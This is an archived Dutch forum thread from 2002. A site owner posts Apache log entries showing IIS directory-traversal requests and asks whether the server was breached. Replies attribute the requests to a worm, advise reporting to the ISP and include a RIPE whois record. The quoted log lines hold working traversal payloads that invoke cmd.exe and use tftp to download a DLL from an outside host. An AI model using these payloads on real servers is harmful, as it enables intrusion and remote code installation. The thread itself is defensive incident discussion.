Deze website maakt gebruik van cookies. Waarom? Klik hier voor ons privacy- en cookiebeleid. Door op akkoord te klikken of door gebruik te blijven maken van deze website geeft u aan akkoord te zijn met het gebruik van cookies.

Akkoord

Vraag & Antwoord

Beveiliging & privacy

Webserver gehackt?

Remytje
3 antwoorden
  • Mijn logfile van Apache geeft de volgende regels aan:
    [quote:4667f37526]62.194.35.158 - - [11/Jul/2002:22:33:07 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.194.35.158%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 8296 "-" "-"
    62.194.35.158 - - [11/Jul/2002:22:33:09 +0100] "GET /scripts/..%255c../httpodbc.dll HTTP/1.0" 200 8296 "-" "-"
    62.194.35.158 - - [11/Jul/2002:22:33:11 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 8296 "-" "-"
    62.194.35.158 - - [11/Jul/2002:22:33:13 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.194.35.158%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 8296 "-" "-"
    62.194.35.158 - - [11/Jul/2002:22:33:15 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.194.35.158%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 8296 "-" "-"
    62.194.35.158 - - [11/Jul/2002:22:33:16 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.194.35.158%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 8296 "-" "-"
    62.194.35.158 - - [11/Jul/2002:22:33:18 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0" 200 8296 "-" "-"
    62.194.35.158 - - [11/Jul/2002:22:33:20 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 8296 "-" "-"
    [/quote:4667f37526]

    Zijn dit pogingen of is er al daadwerkelijk ingebroken? Ik heb soieso geen [i:4667f37526]winnt[/i:4667f37526] directory.

    Dit IP-adres, 62.194.35.158, krijg ik afgelopen dag vrij vaak te zien in mijn logfile, dus diegene probeert het hardnekkig (of het is al gelukt?). Daarom wil ik achterhalen wie dit is. Ik weet al dat het een chello-gebruiker is, maar heeft iemand nog tips hoe je verder de persoon kan achterhalen?
  • Dit is waarschijnlijk iemand met een code red virus. Je kunt het beste een email sturen naar chello met daarbij het ip adres van deze persoon en de logfile met daarin de entries. Waarschijnlijk abuse@chello.nl maar dat weet ik niet helemaal zeker. Je hoeft je hierover geen zorgen te maken, want het is een internet information server bug en dat werkt niet op apache. De persoon weet waarschijnlijk niet eens dat zijn pc dit bericht verstuurd. Daarom even een mail naar chello.

    grtz
  • inetnum: 62.194.0.0 - 62.194.0.127
    netname: CMTS-01-1
    descr: UPC-NL / Chello
    descr: DTV Platform Amsterdam
    country: NL
    admin-c: UCR1-RIPE
    tech-c: UCR1-RIPE
    status: ASSIGNED PA
    notify: registry@upc.nl
    mnt-by: UPCNL-MNT
    changed: registry@upc.nl 20010622
    source: RIPE

    route: 62.194.0.0/15
    descr: A2000 / Kabeltelevisie Amsterdam B.V.
    origin: AS8209
    remarks: —————————————————
    remarks: E-mail is the preferred contact method!
    remarks: —————————————————
    remarks: Please use one of the following addresses:
    [b:304f8fbedd]remarks: abuse@a2000.nl - for abuse notification[/b:304f8fbedd]
    remarks: helpdesk@A2000.nl - Technical support for customers
    remarks: hostmaster@a2000.com - For the hostmaster team
    remarks: —————————————————
    notify: hostmaster@A2000.com
    mnt-by: A2000-KTA-MNT
    changed: rhuisman@upc.nl 20010105
    source: RIPE

Beantwoord deze vraag

Dit is een gearchiveerde pagina. Antwoorden is niet meer mogelijk.